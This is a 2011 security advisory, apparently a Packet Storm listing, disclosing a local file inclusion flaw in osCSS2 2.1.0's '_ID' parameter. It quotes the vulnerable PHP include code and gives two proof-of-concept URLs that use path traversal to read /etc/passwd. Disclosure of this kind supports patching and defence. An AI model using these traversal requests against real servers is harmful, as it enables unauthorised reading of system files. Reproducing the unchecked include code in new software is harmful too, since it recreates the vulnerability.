osCSS2 2.1.0 Local File Inclusion

2011-11-09T00:00:00
ID PACKETSTORM:106758
Type packetstorm
Reporter Stefan Schurtz
Modified 2011-11-09T00:00:00

Description

                                        
                                            `Advisory: osCSS2 "_ID" parameter Local file inclusion  
Advisory ID: SSCHADV2011-034  
Author: Stefan Schurtz  
Affected Software: Successfully tested on osCSS2 2.1.0 (latest version)  
Vendor URL: http://oscss.org/  
Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1  
  
==========================  
Vulnerability Description  
==========================  
  
osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability  
  
==========================  
Vulnerable code  
==========================  
  
//.htaccess  
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}  
  
//content.php  
require($page->path_gabarit());  
  
// includes/classes/page.php  
public function pile_file_lang($path_file){  
global $lang;  
if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;  
  
if(!in_array($path_file,(array)$this->PileFileLang))  
include_once($path_file);  
}  
  
==================  
PoC-Exploit  
==================  
  
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd  
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd  
  
=========  
Solution  
=========  
  
Fixed in svn branche 2.1.0 and reported in develop version 2.1.1  
  
====================  
Disclosure Timeline  
====================  
  
08-Nov-2011 - informed vendor  
08-Nov-2011 - release date of this security advisory  
08-Nov-2011 - fixed by vendor  
  
========  
Credits  
========  
  
Vulnerability found and advisory written by Stefan Schurtz.  
  
===========  
References  
===========  
  
http://oscss.org/  
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html  
http://dev.oscss.org/task/892  
http://www.rul3z.de/advisories/SSCHADV2011-034.txt  
`